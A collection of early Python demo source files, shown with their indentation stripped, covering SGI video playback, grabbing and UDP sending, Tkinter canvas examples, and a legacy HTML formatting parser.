data = self._getscenedata()
data['START'] = pos
self.modified = 1
#
def comment_get(self):
data = self._getscenedata()
if data.has_key('COMMENT'):
return data['COMMENT']
else:
return ''
#
def comment_set(self, comment):
data = self._getscenedata()
data['COMMENT'] = comment
self.modified = 1
#
# Get the scene id of the current scene.
#
def get_cursceneid(self):
pos = self._getscenedata()['START']
str = '%02d:%02d:%02d:%02d ' % pos
return str + self.curscene
#
# Convert a scene id to a scene name.
#
def scene_id2name(self, id):
pos = string.find(id, ' ')
if pos <= 0:
raise error, 'Not a scene id: '+id
return id[pos+1:]
#
# Select a scene given a position.
#
def pos_select(self, pos):
prevmovie = None
movies = self.get_movienames()
for movie in movies:
mpos = self.movies[movie]['-ALL-']['START']
if mpos > pos:
break
prevmovie = movie
if not prevmovie:
raise error, 'Scene before BOT'
self.movie_select(prevmovie)
scenes = self.get_scenenames()
scenedict = self._getmoviedict()
prevscene = 'START'
for scene in scenes:
if scenedict[scene]['START'] > pos:
break
prevscene = scene
self.scene_select(prevscene)
```
#### File: sgi/video/VGrabber.py
```python
import gl, GL
import VFile
import GET
from VFile import Error
class VGrabber(VFile.VideoParams):
# XXX The constructor of VideoParams is just fine, for now
# Grab a frame.
# Return (data, chromdata) just like getnextframe().
def grabframe(self):
grabber = choose_grabber(self.format)
return grabber(self.width, self.height, self.packfactor)
# Choose one of the grabber functions below based upon a color system name
def choose_grabber(format):
try:
return eval('grab_' + format)
except:
raise Error, 'Unknown color system: ' + `format`
# Routines to grab data, per color system (only a few really supported).
# (These functions are used via eval with a constructed argument!)
def grab_rgb(w, h, pf):
if gl.getdisplaymode() <> GET.DMRGB:
raise Error, 'Sorry, can only grab rgb in single-buf rgbmode'
if pf <> (1, 1):
raise Error, 'Sorry, only grab rgb with packfactor (1,1)'
return gl.lrectread(0, 0, w-1, h-1), None
def grab_rgb8(w, h, pf):
if gl.getdisplaymode() <> GET.DMRGB:
raise Error, 'Sorry, can only grab rgb8 in single-buf rgbmode'
if pf <> (1, 1):
raise Error, 'Sorry, can only grab rgb8 with packfactor (1,1)'
if not VFile.is_entry_indigo():
raise Error, 'Sorry, can only grab rgb8 on entry level Indigo'
# XXX Dirty Dirty here.
# XXX Set buffer to cmap mode, grab image and set it back.
gl.cmode()
gl.gconfig()
gl.pixmode(GL.PM_SIZE, 8)
data = gl.lrectread(0, 0, w-1, h-1)
data = data[:w*h] # BUG FIX for python lrectread
gl.RGBmode()
gl.gconfig()
gl.pixmode(GL.PM_SIZE, 32)
return data, None
def grab_grey(w, h, pf):
raise Error, 'Sorry, grabbing grey not implemented'
def grab_yiq(w, h, pf):
raise Error, 'Sorry, grabbing yiq not implemented'
def grab_hls(w, h, pf):
raise Error, 'Sorry, grabbing hls not implemented'
def grab_hsv(w, h, pf):
raise Error, 'Sorry, grabbing hsv not implemented'
def grab_jpeg(w, h, pf):
data, dummy = grab_rgb(w, h, pf)
import jpeg
data = jpeg.compress(data, w, h, 4)
return data, None
def grab_jpeggrey(w, h, pf):
raise Error, 'sorry, grabbing jpeggrey not implemented'
```
#### File: sgi/video/vinfo.py
```python
from gl import *
from GL import *
from DEVICE import *
import time
import sys
import getopt
class Struct(): pass
epoch = Struct()
EndOfFile = 'End of file'
bye = 'bye'
def openvideo(filename):
f = open(filename, 'r')
line = f.readline()
if not line: raise EndOfFile
if line[:4] == 'CMIF': line = f.readline()
x = eval(line[:-1])
if len(x) == 3: w, h, pf = x
else: w, h = x; pf = 2
return f, w, h, pf
def loadframe(f, w, h, pf):
line = f.readline()
if line == '':
raise EndOfFile
x = eval(line[:-1])
if type(x) == type(0) or type(x) == type(0.0):
tijd = x
if pf == 0:
size = w*h*4
else:
size = (w/pf) * (h/pf)
else:
tijd, size = x
f.seek(size, 1)
return tijd
def main():
delta = 0
short = 0
try:
opts, names = getopt.getopt(sys.argv[1:], 'ds')
except getopt.error, msg:
sys.stderr.write(msg + '\n')
sys.stderr.write('usage: vinfo [-d] [-s] [file] ...\n')
sys.exit(2)
for opt, arg in opts:
if opt == '-d': delta = 1 # print delta between frames
elif opt == '-s': short = 1 # short: don't print times
if names == []:
names = ['film.video']
for name in names:
try:
f, w, h, pf = openvideo(name)
except:
sys.stderr.write(name + ': cannot open\n')
continue
if pf == 0:
size = w*h*4
else:
size = (w/pf) * (h/pf)
print name, ':', w, 'x', h, '; pf =', pf, ', size =', size,
if pf == 0:
print '(color)',
else:
print '(' + `(w/pf)` + 'x' + `(h/pf)` + ')',
if (w/pf)%4 <> 0: print '!!!',
print
num = 0
try:
otijd = 0
while not short:
try:
tijd = loadframe(f, w, h, pf)
if delta: print '\t' + `tijd-otijd`,
else: print '\t' + `tijd`,
otijd = tijd
num = num + 1
if num % 8 == 0:
print
except EndOfFile:
raise bye
except bye:
pass
if num % 8 <> 0:
print
f.close()
main()
```
#### File: sgi/video/Vplay.py
```python
def help():
print 'Usage: Vplay [options] [file] ...'
print
print 'Options:'
print '-M magnify : magnify the image by the given factor'
print '-d : write some debug stuff on stderr'
print '-l : loop, playing the movie over and over again'
print '-m delta : drop frames closer than delta seconds (default 0.)'
print '-n : don\'t wait after each file'
print '-q : quiet, no informative messages'
print '-r delta : regenerate input time base delta seconds apart'
print '-s speed : speed change factor (default 1.0)'
print '-t : use a 2nd thread for read-ahead'
print '-x left : window offset from left of screen'
print '-y top : window offset from top of screen'
print '-w width : window width'
print '-h height : window height'
print '-b color : background color (white,black or (r,g,b))'
print 'file ... : file(s) to play; default film.video'
print
print 'User interface:'
print 'Press the left mouse button to stop or restart the movie.'
print 'Press ESC or use the window manager Close or Quit command'
print 'to close the window and play the next file (if any).'
# Imported modules
import sys
sys.path.append('/ufs/guido/src/video') # Increase chance of finding VFile
import VFile
import time
import gl, GL
from DEVICE import REDRAW, ESCKEY, LEFTMOUSE, WINSHUT, WINQUIT
import getopt
import string
# Global options
debug = 0
looping = 0
magnify = 1
mindelta = 0
nowait = 0
quiet = 0
regen = None
speed = 1.0
threading = 0
xoff = yoff = None
xwsiz = ywsiz = None
bgcolor = None
# Main program -- mostly command line parsing
def main():
global debug, looping, magnify, mindelta, nowait, quiet, regen, speed
global threading, xoff, yoff, xwsiz, ywsiz, bgcolor
# Parse command line
try:
opts, args = getopt.getopt(sys.argv[1:], \
'M:dlm:nqr:s:tx:y:w:h:b:')
except getopt.error, msg:
sys.stdout = sys.stderr
print 'Error:', msg, '\n'
help()
sys.exit(2)
# Interpret options
try:
for opt, arg in opts:
if opt == '-M': magnify = float(eval(arg))
if opt == '-d': debug = debug + 1
if opt == '-l': looping = 1
if opt == '-m': mindelta = float(eval(arg))
if opt == '-n': nowait = 1
if opt == '-q': quiet = 1
if opt == '-r': regen = float(eval(arg))
if opt == '-s':
try:
speed = float(eval(arg))
except:
sys.stdout = sys.stderr
print 'Option -s needs float argument'
sys.exit(2)
if opt == '-t':
try:
import thread
threading = 1
except ImportError:
print 'Sorry, this version of Python',
print 'does not support threads:',
print '-t ignored'
if opt == '-x': xoff = string.atoi(arg)
if opt == '-y': yoff = string.atoi(arg)
if opt == '-w': xwsiz = string.atoi(arg)
if opt == '-h': ywsiz = string.atoi(arg)
if opt == '-b':
if arg == 'black':
bgcolor = (0,0,0)
elif arg == 'white':
bgcolor = (255,255,255)
else:
try:
bgcolor = eval(arg)
xxr, xxg, xxb = bgcolor
except:
print '-b needs (r,g,b) tuple'
sys.exit(2)
except string.atoi_error:
sys.stdout = sys.stderr
print 'Option', opt, 'requires integer argument'
sys.exit(2)
# Check validity of certain options combinations
if nowait and looping:
print 'Warning: -n and -l are mutually exclusive; -n ignored'
nowait = 0
if xoff <> None and yoff == None:
print 'Warning: -x without -y ignored'
if xoff == None and yoff <> None:
print 'Warning: -y without -x ignored'
# Process all files
if not args: args = ['film.video']
sts = 0
for filename in args:
sts = (process(filename) or sts)
# Exit with proper exit status
sys.exit(sts)
# Process one movie file
def process(filename):
try:
vin = VFile.VinFile(filename)
except IOError, msg:
sys.stderr.write(filename + ': I/O error: ' + `msg` + '\n')
return 1
except VFile.Error, msg:
sys.stderr.write(msg + '\n')
return 1
except EOFError:
sys.stderr.write(filename + ': EOF in video header\n')
return 1
if not quiet:
vin.printinfo()
gl.foreground()
width, height = int(vin.width * magnify), int(vin.height * magnify)
xborder = yborder = 0
if xwsiz:
vin.xorigin = (xwsiz - width)/2
width = xwsiz
if ywsiz:
vin.yorigin = (ywsiz - height)/2
height = ywsiz
if xoff <> None and yoff <> None:
scrheight = gl.getgdesc(GL.GD_YPMAX)
gl.prefposition(xoff, xoff+width-1, \
scrheight-yoff-height, scrheight-yoff-1)
else:
gl.prefsize(width, height)
win = gl.winopen(filename)
gl.clear()
if quiet: vin.quiet = 1
vin.initcolormap()
if bgcolor:
r, g, b = bgcolor
vin.clearto(r,g,b)
gl.qdevice(ESCKEY)
gl.qdevice(WINSHUT)
gl.qdevice(WINQUIT)
gl.qdevice(LEFTMOUSE)
stop = 0
while not stop:
gl.wintitle(filename)
stop = (playonce(vin) or nowait)
gl.wintitle('(done) ' + filename)
if not looping:
while not stop:
dev, val = gl.qread()
if dev == REDRAW:
if bgcolor:
r,g,b = bgcolor
vin.clearto(r,g,b)
else:
vin.clear()
if dev == LEFTMOUSE and val == 1:
break # Continue outer loop
if dev == ESCKEY and val == 1 or \
dev in (WINSHUT, WINQUIT):
stop = 1
# Set xoff, yoff for the next window from the current window
global xoff, yoff
xoff, yoff = gl.getorigin()
width, height = gl.getsize()
scrheight = gl.getgdesc(GL.GD_YPMAX)
yoff = scrheight - yoff - height
gl.winclose(win)
return 0
# Play a movie once; return 1 if user wants to stop, 0 if not
def playonce(vin):
vin.rewind()
vin.colormapinited = 1
vin.magnify = magnify
if threading:
MAXSIZE = 20 # Don't read ahead too much
import thread
import Queue
queue = Queue.Queue(MAXSIZE)
stop = []
thread.start_new_thread(read_ahead, (vin, queue, stop))
# Get the read-ahead thread going
while queue.qsize() < MAXSIZE/2 and not stop:
time.sleep(0.100)
tin = 0
toffset = 0
oldtin = 0
told = 0
nin = 0
nout = 0
nlate = 0
nskipped = 0
data = None
tlast = t0 = time.time()
while 1:
if gl.qtest():
dev, val = gl.qread()
if dev == ESCKEY and val == 1 or \
dev in (WINSHUT, WINQUIT) or \
dev == LEFTMOUSE and val == 1:
if debug: sys.stderr.write('\n')
if threading:
stop.append(None)
while 1:
item = queue.get()
if item == None: break
return (dev != LEFTMOUSE)
if dev == REDRAW:
gl.reshapeviewport()
if data: vin.showframe(data, cdata)
if threading:
if debug and queue.empty(): sys.stderr.write('.')
item = queue.get()
if item == None: break
tin, data, cdata = item
else:
try:
tin, size, csize = vin.getnextframeheader()
except EOFError:
break
tin = tin*0.001
nin = nin+1
if tin+toffset < oldtin:
print 'Fix reversed time:', oldtin, 'to', tin
toffset = oldtin - tin
tin = tin + toffset
oldtin = tin
if regen: tout = nin * regen
else: tout = tin
tout = tout / speed
if tout - told < mindelta:
nskipped = nskipped + 1
if not threading:
vin.skipnextframedata(size, csize)
else:
if not threading:
try:
data, cdata = \
vin.getnextframedata(size, csize)
except EOFError:
if not quiet:
print '[incomplete last frame]'
break
now = time.time()
dt = (tout-told) - (now-tlast)
told = tout
if debug: sys.stderr.write(`round(dt, 3)` + ' ')
if dt < 0: nlate = nlate + 1
if dt > 0:
time.sleep(dt)
now = time.time()
tlast = now
vin.showframe(data, cdata)
nout = nout + 1
t1 = time.time()
if debug: sys.stderr.write('\n')
if quiet: return 0
print 'Recorded:', nin, 'frames in', round(tin, 3), 'sec.',
if tin: print '-- average', round(nin/tin, 1), 'frames/sec',
print
if nskipped: print 'Skipped', nskipped, 'frames'
tout = t1-t0
print 'Played:', nout,
print 'frames in', round(tout, 3), 'sec.',
if tout: print '-- average', round(nout/tout, 1), 'frames/sec',
print
if nlate: print 'There were', nlate, 'late frames'
return 0
# Read-ahead thread
def read_ahead(vin, queue, stop):
try:
while not stop: queue.put(vin.getnextframe())
except EOFError:
pass
queue.put(None)
stop.append(None)
# Don't forget to call the main program
try:
main()
except KeyboardInterrupt:
print '[Interrupt]'
```
#### File: sgi/video/Vsend.py
```python
import sys
import time
import struct
import string
from socket import *
from SOCKET import *
import gl, GL, DEVICE
sys.path.append('/ufs/guido/src/video')
import LiveVideoIn
import LiveVideoOut
import SV
import getopt
from IN import *
from senddefs import *
def usage(msg):
print msg
print 'usage: Vsend [-b] [-h height] [-p port] [-s size] [-t ttl] [-c type] [-m]',
print '[-w width] [host] ...'
print '-b : broadcast on local net'
print '-h height : window height (default ' + `DEFHEIGHT` + ')'
print '-p port : port to use (default ' + `DEFPORT` + ')'
print '-t ttl : time-to-live (multicast only; default 1)'
print '-s size : max packet size (default ' + `DEFPKTMAX` + ')'
print '-w width : window width (default ' + `DEFWIDTH` + ')'
print '-c type : Type: rgb8, mono or grey (default rgb8)'
print '[host] ...: host(s) to send to (default multicast to ' + \
DEFMCAST + ')'
sys.exit(2)
def main():
sys.stdout = sys.stderr
hosts = []
port = DEFPORT
ttl = -1
pktmax = DEFPKTMAX
width = DEFWIDTH
height = DEFHEIGHT
vtype = 'rgb8'
try:
opts, args = getopt.getopt(sys.argv[1:], 'bh:p:s:t:w:c:')
except getopt.error, msg:
usage(msg)
try:
for opt, optarg in opts:
if opt == '-p':
port = string.atoi(optarg)
if opt == '-b':
host = '<broadcast>'
if opt == '-t':
ttl = string.atoi(optarg)
if opt == '-s':
pktmax = string.atoi(optarg)
if opt == '-w':
width = string.atoi(optarg)
if opt == '-h':
height = string.atoi(optarg)
if opt == '-c':
vtype = optarg
except string.atoi_error, msg:
usage('bad integer: ' + msg)
for host in args:
hosts.append(gethostbyname(host))
if not hosts:
hosts.append(gethostbyname(DEFMCAST))
if not LiveVideoIn.have_video:
print 'Sorry, no video available (use python-405)'
sys.exit(1)
gl.foreground()
gl.prefsize(width, height)
gl.stepunit(8, 6)
wid = gl.winopen('Vsend')
gl.keepaspect(width, height)
gl.stepunit(8, 6)
gl.maxsize(SV.PAL_XMAX, SV.PAL_YMAX)
gl.winconstraints()
gl.qdevice(DEVICE.ESCKEY)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINFREEZE)
gl.qdevice(DEVICE.WINTHAW)
width, height = gl.getsize()
lvo = LiveVideoOut.LiveVideoOut(wid, width, height, vtype)
lvi = LiveVideoIn.LiveVideoIn(pktmax, width, height, vtype)
s = socket(AF_INET, SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
if ttl >= 0:
s.setsockopt(IPPROTO_IP, IP_MULTICAST_TTL, chr(ttl))
frozen = 0
while 1:
if gl.qtest():
dev, val = gl.qread()
if dev in (DEVICE.ESCKEY, \
DEVICE.WINSHUT, DEVICE.WINQUIT):
break
if dev == DEVICE.WINFREEZE:
frozen = 1
if dev == DEVICE.WINTHAW:
frozen = 0
if dev == DEVICE.REDRAW:
w, h = gl.getsize()
x, y = gl.getorigin()
if (w, h) <> (width, height):
width, height = w, h
lvi.resizevideo(width, height)
lvo.resizevideo(width, height)
rv = lvi.getnextpacket()
if not rv:
time.sleep(0.010)
continue
pos, data = rv
if not frozen:
lvo.putnextpacket(pos, data)
hdr = struct.pack('hhh', pos, width, height)
for host in hosts:
try:
s.sendto(hdr + data, (host, port))
except error, msg: # really socket.error
if msg[0] <> 121: # no buffer space available
raise error, msg # re-raise it
print 'Warning:', msg[1]
lvi.close()
lvo.close()
main()
```
#### File: sgi/video/Vstat.py
```python
import sys
import sv, SV
def main():
v = sv.OpenVideo()
for name in dir(SV):
const = getattr(SV, name)
if type(const) is type(0):
sys.stdout.flush()
params = [const, 0]
try:
v.GetParam(params)
except sv.error, msg:
## print name, msg
continue
print name, params
main()
```
#### File: tkinter/guido/canvasevents.py
```python
from Tkinter import *
from Canvas import Oval, Group, CanvasText
# Fix a bug in Canvas.Group as distributed in Python 1.4. The
# distributed bind() method is broken. This is what should be used:
class Group(Group):
def bind(self, sequence=None, command=None):
return self.canvas.tag_bind(self.id, sequence, command)
class Object:
"""Base class for composite graphical objects.
Objects belong to a canvas, and can be moved around on the canvas.
They also belong to at most one ``pile'' of objects, and can be
transferred between piles (or removed from their pile).
Objects have a canonical ``x, y'' position which is moved when the
object is moved. Where the object is relative to this position
depends on the object; for simple objects, it may be their center.
Objects have mouse sensitivity. They can be clicked, dragged and
double-clicked. The behavior may actually determined by the pile
they are in.
All instance attributes are public since the derived class may
need them.
"""
def __init__(self, canvas, x=0, y=0, fill='red', text='object'):
self.canvas = canvas
self.x = x
self.y = y
self.pile = None
self.group = Group(self.canvas)
self.createitems(fill, text)
def __str__(self):
return str(self.group)
def createitems(self, fill, text):
self.__oval = Oval(self.canvas,
self.x-20, self.y-10, self.x+20, self.y+10,
fill=fill, width=3)
self.group.addtag_withtag(self.__oval)
self.__text = CanvasText(self.canvas,
self.x, self.y, text=text)
self.group.addtag_withtag(self.__text)
def moveby(self, dx, dy):
if dx == dy == 0:
return
self.group.move(dx, dy)
self.x = self.x + dx
self.y = self.y + dy
def moveto(self, x, y):
self.moveby(x - self.x, y - self.y)
def transfer(self, pile):
if self.pile:
self.pile.delete(self)
self.pile = None
self.pile = pile
if self.pile:
self.pile.add(self)
def tkraise(self):
self.group.tkraise()
class Bottom(Object):
"""An object to serve as the bottom of a pile."""
def createitems(self, *args):
self.__oval = Oval(self.canvas,
self.x-20, self.y-10, self.x+20, self.y+10,
fill='gray', outline='')
self.group.addtag_withtag(self.__oval)
class Pile:
"""A group of graphical objects."""
def __init__(self, canvas, x, y, tag=None):
self.canvas = canvas
self.x = x
self.y = y
self.objects = []
self.bottom = Bottom(self.canvas, self.x, self.y)
self.group = Group(self.canvas, tag=tag)
self.group.addtag_withtag(self.bottom.group)
self.bindhandlers()
def bindhandlers(self):
self.group.bind('<1>', self.clickhandler)
self.group.bind('<Double-1>', self.doubleclickhandler)
def add(self, object):
self.objects.append(object)
self.group.addtag_withtag(object.group)
self.position(object)
def delete(self, object):
object.group.dtag(self.group)
self.objects.remove(object)
def position(self, object):
object.tkraise()
i = self.objects.index(object)
object.moveto(self.x + i*4, self.y + i*8)
def clickhandler(self, event):
pass
def doubleclickhandler(self, event):
pass
class MovingPile(Pile):
def bindhandlers(self):
Pile.bindhandlers(self)
self.group.bind('<B1-Motion>', self.motionhandler)
self.group.bind('<ButtonRelease-1>', self.releasehandler)
movethis = None
def clickhandler(self, event):
tags = self.canvas.gettags('current')
for i in range(len(self.objects)):
o = self.objects[i]
if o.group.tag in tags:
break
else:
self.movethis = None
return
self.movethis = self.objects[i:]
for o in self.movethis:
o.tkraise()
self.lastx = event.x
self.lasty = event.y
doubleclickhandler = clickhandler
def motionhandler(self, event):
if not self.movethis:
return
dx = event.x - self.lastx
dy = event.y - self.lasty
self.lastx = event.x
self.lasty = event.y
for o in self.movethis:
o.moveby(dx, dy)
def releasehandler(self, event):
objects = self.movethis
if not objects:
return
self.movethis = None
self.finishmove(objects)
def finishmove(self, objects):
for o in objects:
self.position(o)
class Pile1(MovingPile):
x = 50
y = 50
tag = 'p1'
def __init__(self, demo):
self.demo = demo
MovingPile.__init__(self, self.demo.canvas, self.x, self.y, self.tag)
def doubleclickhandler(self, event):
try:
o = self.objects[-1]
except IndexError:
return
o.transfer(self.other())
MovingPile.doubleclickhandler(self, event)
def other(self):
return self.demo.p2
def finishmove(self, objects):
o = objects[0]
p = self.other()
x, y = o.x, o.y
if (x-p.x)**2 + (y-p.y)**2 < (x-self.x)**2 + (y-self.y)**2:
for o in objects:
o.transfer(p)
else:
MovingPile.finishmove(self, objects)
class Pile2(Pile1):
x = 150
y = 50
tag = 'p2'
def other(self):
return self.demo.p1
class Demo:
def __init__(self, master):
self.master = master
self.canvas = Canvas(master,
width=200, height=200,
background='yellow',
relief=SUNKEN, borderwidth=2)
self.canvas.pack(expand=1, fill=BOTH)
self.p1 = Pile1(self)
self.p2 = Pile2(self)
o1 = Object(self.canvas, fill='red', text='o1')
o2 = Object(self.canvas, fill='green', text='o2')
o3 = Object(self.canvas, fill='light blue', text='o3')
o1.transfer(self.p1)
o2.transfer(self.p1)
o3.transfer(self.p2)
# Main function, run when invoked as a stand-alone Python program.
def main():
root = Tk()
demo = Demo(root)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
main()
```
#### File: tkinter/matt/canvas-with-scrollbars.py
```python
from Tkinter import *
# This example program creates a scroling canvas, and demonstrates
# how to tie scrollbars and canvses together. The mechanism
# is analogus for listboxes and other widgets with
# "xscroll" and "yscroll" configuration options.
class Test(Frame):
def printit(self):
print "hi"
def createWidgets(self):
self.question = Label(self, text="Can Find The BLUE Square??????")
self.question.pack()
self.QUIT = Button(self, text='QUIT', background='red',
height=3, command=self.quit)
self.QUIT.pack(side=BOTTOM, fill=BOTH)
spacer = Frame(self, height="0.25i")
spacer.pack(side=BOTTOM)
# notice that the scroll region (20" x 20") is larger than
# displayed size of the widget (5" x 5")
self.draw = Canvas(self, width="5i", height="5i",
background="white",
scrollregion=(0, 0, "20i", "20i"))
self.draw.scrollX = Scrollbar(self, orient=HORIZONTAL)
self.draw.scrollY = Scrollbar(self, orient=VERTICAL)
# now tie the three together. This is standard boilerplate text
self.draw['xscrollcommand'] = self.draw.scrollX.set
self.draw['yscrollcommand'] = self.draw.scrollY.set
self.draw.scrollX['command'] = self.draw.xview
self.draw.scrollY['command'] = self.draw.yview
# draw something. Note that the first square
# is visible, but you need to scroll to see the second one.
self.draw.create_rectangle(0, 0, "3.5i", "3.5i", fill="black")
self.draw.create_rectangle("10i", "10i", "13.5i", "13.5i", fill="blue")
# pack 'em up
self.draw.scrollX.pack(side=BOTTOM, fill=X)
self.draw.scrollY.pack(side=RIGHT, fill=Y)
self.draw.pack(side=LEFT)
def scrollCanvasX(self, *args):
print "scrolling", args
print self.draw.scrollX.get()
def __init__(self, master=None):
Frame.__init__(self, master)
Pack.config(self)
self.createWidgets()
test = Test()
test.mainloop()
```
#### File: tkinter/www/htmllib.py
```python
import os
import sys
import regex
import string
import sgmllib
class HTMLParser(sgmllib.SGMLParser):
# Copy base class entities and add some
entitydefs = {}
for key in sgmllib.SGMLParser.entitydefs.keys():
entitydefs[key] = sgmllib.SGMLParser.entitydefs[key]
entitydefs['bullet'] = '*'
# Provided -- handlers for tags introducing literal text
def start_listing(self, attrs):
self.setliteral('listing')
self.literal_bgn('listing', attrs)
def end_listing(self):
self.literal_end('listing')
def start_xmp(self, attrs):
self.setliteral('xmp')
self.literal_bgn('xmp', attrs)
def end_xmp(self):
self.literal_end('xmp')
def do_plaintext(self, attrs):
self.setnomoretags()
self.literal_bgn('plaintext', attrs)
# To be overridden -- begin/end literal mode
def literal_bgn(self, tag, attrs): pass
def literal_end(self, tag): pass
# Next level of sophistication -- collect anchors, title, nextid and isindex
class CollectingParser(HTMLParser):
#
def __init__(self):
HTMLParser.__init__(self)
self.savetext = None
self.nextid = ''
self.isindex = 0
self.title = ''
self.inanchor = 0
self.anchors = []
self.anchornames = []
self.anchortypes = []
#
def start_a(self, attrs):
self.inanchor = 0
href = ''
name = ''
type = ''
for attrname, value in attrs:
if attrname == 'href':
href = value
if attrname == 'name=':
name = value
if attrname == 'type=':
type = string.lower(value)
if not (href or name):
return
self.anchors.append(href)
self.anchornames.append(name)
self.anchortypes.append(type)
self.inanchor = len(self.anchors)
if not href:
self.inanchor = -self.inanchor
#
def end_a(self):
if self.inanchor > 0:
# Don't show anchors pointing into the current document
if self.anchors[self.inanchor-1][:1] <> '#':
self.handle_data('[' + `self.inanchor` + ']')
self.inanchor = 0
#
def start_header(self, attrs): pass
def end_header(self): pass
#
# (head is the same as header)
def start_head(self, attrs): pass
def end_head(self): pass
#
def start_body(self, attrs): pass
def end_body(self): pass
#
def do_nextid(self, attrs):
self.nextid = attrs
#
def do_isindex(self, attrs):
self.isindex = 1
#
def start_title(self, attrs):
self.savetext = ''
#
def end_title(self):
if self.savetext <> None:
self.title = self.savetext
self.savetext = None
#
def handle_data(self, text):
if self.savetext is not None:
self.savetext = self.savetext + text
# Formatting parser -- takes a formatter and a style sheet as arguments
# XXX The use of style sheets should change: for each tag and end tag
# there should be a style definition, and a style definition should
# encompass many more parameters: font, justification, indentation,
# vspace before, vspace after, hanging tag...
wordprog = regex.compile('[^ \t\n]*')
spaceprog = regex.compile('[ \t\n]*')
class FormattingParser(CollectingParser):
def __init__(self, formatter, stylesheet):
CollectingParser.__init__(self)
self.fmt = formatter
self.stl = stylesheet
self.savetext = None
self.compact = 0
self.nofill = 0
self.resetfont()
self.setindent(self.stl.stdindent)
def resetfont(self):
self.fontstack = []
self.stylestack = []
self.fontset = self.stl.stdfontset
self.style = ROMAN
self.passfont()
def passfont(self):
font = self.fontset[self.style]
self.fmt.setfont(font)
def pushstyle(self, style):
self.stylestack.append(self.style)
self.style = min(style, len(self.fontset)-1)
self.passfont()
def popstyle(self):
self.style = self.stylestack[-1]
del self.stylestack[-1]
self.passfont()
def pushfontset(self, fontset, style):
self.fontstack.append(self.fontset)
self.fontset = fontset
self.pushstyle(style)
def popfontset(self):
self.fontset = self.fontstack[-1]
del self.fontstack[-1]
self.popstyle()
def flush(self):
self.fmt.flush()
def setindent(self, n):
self.fmt.setleftindent(n)
def needvspace(self, n):
self.fmt.needvspace(n)
def close(self):
HTMLParser.close(self)
self.fmt.flush()
def handle_literal(self, text):
lines = string.splitfields(text, '\n')
for i in range(1, len(lines)):
lines[i] = string.expandtabs(lines[i], 8)
for line in lines[:-1]:
self.fmt.addword(line, 0)
self.fmt.flush()
self.fmt.nospace = 0
for line in lines[-1:]:
self.fmt.addword(line, 0)
def handle_data(self, text):
if self.savetext is not None:
self.savetext = self.savetext + text
return
if self.literal:
self.handle_literal(text)
return
i = 0
n = len(text)
while i < n:
j = i + wordprog.match(text, i)
word = text[i:j]
i = j + spaceprog.match(text, j)
self.fmt.addword(word, i-j)
if self.nofill and '\n' in text[j:i]:
self.fmt.flush()
self.fmt.nospace = 0
i = j+1
while text[i-1] <> '\n': i = i+1
def literal_bgn(self, tag, attrs):
if tag == 'plaintext':
self.flush()
else:
self.needvspace(1)
self.pushfontset(self.stl.stdfontset, FIXED)
self.setindent(self.stl.literalindent)
def literal_end(self, tag):
self.needvspace(1)
self.popfontset()
self.setindent(self.stl.stdindent)
def start_title(self, attrs):
self.flush()
self.savetext = ''
# NB end_title is unchanged
def do_p(self, attrs):
if self.compact:
self.flush()
else:
self.needvspace(1)
def do_hr(self, attrs):
self.fmt.hrule()
def start_h1(self, attrs):
self.needvspace(2)
self.setindent(self.stl.h1indent)
self.pushfontset(self.stl.h1fontset, BOLD)
self.fmt.setjust('c')
def end_h1(self):
self.popfontset()
self.needvspace(2)
self.setindent(self.stl.stdindent)
self.fmt.setjust('l')
def start_h2(self, attrs):
self.needvspace(1)
self.setindent(self.stl.h2indent)
self.pushfontset(self.stl.h2fontset, BOLD)
def end_h2(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
def start_h3(self, attrs):
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.pushfontset(self.stl.h3fontset, BOLD)
def end_h3(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
def start_h4(self, attrs):
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.pushfontset(self.stl.stdfontset, BOLD)
def end_h4(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
start_h5 = start_h4
end_h5 = end_h4
start_h6 = start_h5
end_h6 = end_h5
start_h7 = start_h6
end_h7 = end_h6
def start_ul(self, attrs):
self.needvspace(1)
for attrname, value in attrs:
if attrname == 'compact':
self.compact = 1
self.setindent(0)
break
else:
self.setindent(self.stl.ulindent)
start_dir = start_menu = start_ol = start_ul
do_li = do_p
def end_ul(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
end_dir = end_menu = end_ol = end_ul
def start_dl(self, attrs):
for attrname, value in attrs:
if attrname == 'compact':
self.compact = 1
self.needvspace(1)
def end_dl(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
def do_dt(self, attrs):
if self.compact:
self.flush()
else:
self.needvspace(1)
self.setindent(self.stl.stdindent)
def do_dd(self, attrs):
self.fmt.addword('', 1)
self.setindent(self.stl.ddindent)
def start_address(self, attrs):
self.compact = 1
self.needvspace(1)
self.fmt.setjust('r')
def end_address(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.fmt.setjust('l')
def start_pre(self, attrs):
self.needvspace(1)
self.nofill = self.nofill + 1
self.pushstyle(FIXED)
def end_pre(self):
self.popstyle()
self.nofill = self.nofill - 1
self.needvspace(1)
start_typewriter = start_pre
end_typewriter = end_pre
def do_img(self, attrs):
self.fmt.addword('(image)', 0)
# Physical styles
def start_tt(self, attrs): self.pushstyle(FIXED)
def end_tt(self): self.popstyle()
def start_b(self, attrs): self.pushstyle(BOLD)
def end_b(self): self.popstyle()
def start_i(self, attrs): self.pushstyle(ITALIC)
def end_i(self): self.popstyle()
def start_u(self, attrs): self.pushstyle(ITALIC) # Underline???
def end_u(self): self.popstyle()
def start_r(self, attrs): self.pushstyle(ROMAN) # Not official
def end_r(self): self.popstyle()
# Logical styles
start_em = start_i
end_em = end_i
start_strong = start_b
end_strong = end_b
start_code = start_tt
end_code = end_tt
start_samp = start_tt
end_samp = end_tt
start_kbd = start_tt
end_kbd = end_tt
start_file = start_tt # unofficial
end_file = end_tt
start_var = start_i
end_var = end_i
start_dfn = start_i
end_dfn = end_i
start_cite = start_i
end_cite = end_i
start_hp1 = start_i
end_hp1 = start_i
start_hp2 = start_b
end_hp2 = end_b
def unknown_starttag(self, tag, attrs):
print '*** unknown <' + tag + '>'
